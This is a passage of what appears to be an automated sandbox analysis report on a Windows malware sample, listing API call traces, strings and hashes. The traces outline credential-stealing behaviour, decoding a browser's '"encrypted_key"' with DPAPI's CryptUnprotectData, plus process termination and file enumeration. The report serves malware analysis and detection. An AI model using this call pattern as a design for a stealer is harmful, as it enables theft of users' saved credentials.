                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                                • Part of subcall function 00859AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                                • Part of subcall function 00859AC0: LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                                • Part of subcall function 00859B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00859B84
                                • Part of subcall function 00859B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00859BA3
                                • Part of subcall function 00859B60: LocalFree.KERNEL32(?), ref: 00859BD3
                              Strings
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              APIs
                              • memset.MSVCRT ref: 008694EB
                                • Part of subcall function 00868D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0086951E,00000000), ref: 00868D5B
                                • Part of subcall function 00868D50: RtlAllocateHeap.NTDLL(00000000), ref: 00868D62
                                • Part of subcall function 00868D50: wsprintfW.USER32 ref: 00868D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008695AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 008695C9
                              • CloseHandle.KERNEL32(00000000), ref: 008695D6
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 5e39e3c91035ce85a10f7f20097158f104e68bf39aacd5e5d31c47e27cbba732
                              • Instruction ID: 0f6b4b52c53aa42b17f32d5b432cbdc084e190e3dab5c6a4ead749c784b30fbe
                              • Opcode Fuzzy Hash: 5e39e3c91035ce85a10f7f20097158f104e68bf39aacd5e5d31c47e27cbba732
                              • Instruction Fuzzy Hash: 4A311B71A002189BDB14DBD4CD49BEDB778FB54300F10445AE506AB184DF74AA8ACB92
                              APIs
                              • CreateFileA.KERNEL32(00863AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00863AEE,?), ref: 008692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00863AEE), ref: 00869319
                              • CloseHandle.KERNEL32(000000FF), ref: 00869327
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 53ba9975913cec115c9cad4cc920cf030e2820ac25c73fbc9b4b3262999dde3d
                              • Instruction ID: dae3a250f8660e878b3ee0d42ef33aa4eb75be64f6876d8ab8b73f63ade37a9b
                              • Opcode Fuzzy Hash: 53ba9975913cec115c9cad4cc920cf030e2820ac25c73fbc9b4b3262999dde3d
                              • Instruction Fuzzy Hash: F6F01935F40208ABDB10DBE0DD49B9E77B9EB58710F118255FA51E72C0DA7096018B80
                              APIs
                              • __getptd.LIBCMT ref: 0086C74E
                                • Part of subcall function 0086BF9F: __amsg_exit.LIBCMT ref: 0086BFAF
                              • __getptd.LIBCMT ref: 0086C765
                              • __amsg_exit.LIBCMT ref: 0086C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0086C797
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: e8cfa656b1383ebd23ddee1da2d5e9888c77a88a169ef932663cd10b27e6631f
                              • Instruction ID: cbcb4c2d6895276c5b72754524860574dde8d61ed77a7315ca36974cec46c6ef
                              • Opcode Fuzzy Hash: e8cfa656b1383ebd23ddee1da2d5e9888c77a88a169ef932663cd10b27e6631f
                              • Instruction Fuzzy Hash: 8CF0B4329057109BD724BBBC9807B6E33A1FF00728F234149F554EA1D2DF6499819F5B
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864F7A
                              • lstrcat.KERNEL32(?,00871070), ref: 00864F97
                              • lstrcat.KERNEL32(?,015C8B00), ref: 00864FAB
                              • lstrcat.KERNEL32(?,00871074), ref: 00864FBD
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 0086492C
                                • Part of subcall function 00864910: FindFirstFileA.KERNEL32(?,?), ref: 00864943
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                                • Part of subcall function 00864910: FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                                • Part of subcall function 00864910: FindClose.KERNEL32(000000FF), ref: 00864B92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: b0d6d98d32ecf0a65a6453851de14ef4502f61a6e5c70fd08c073004ef6273a9
                              • Instruction ID: 3eb595b5c852024bdb401053f1a1d546d4f7d44fe6c6eb26952399391a89c2e1
                              • Opcode Fuzzy Hash: b0d6d98d32ecf0a65a6453851de14ef4502f61a6e5c70fd08c073004ef6273a9
                              • Instruction Fuzzy Hash: 0421B876A00204A7CB54FBA4DC46EEE333CF764300F004556B659D3185EE7496C98BD3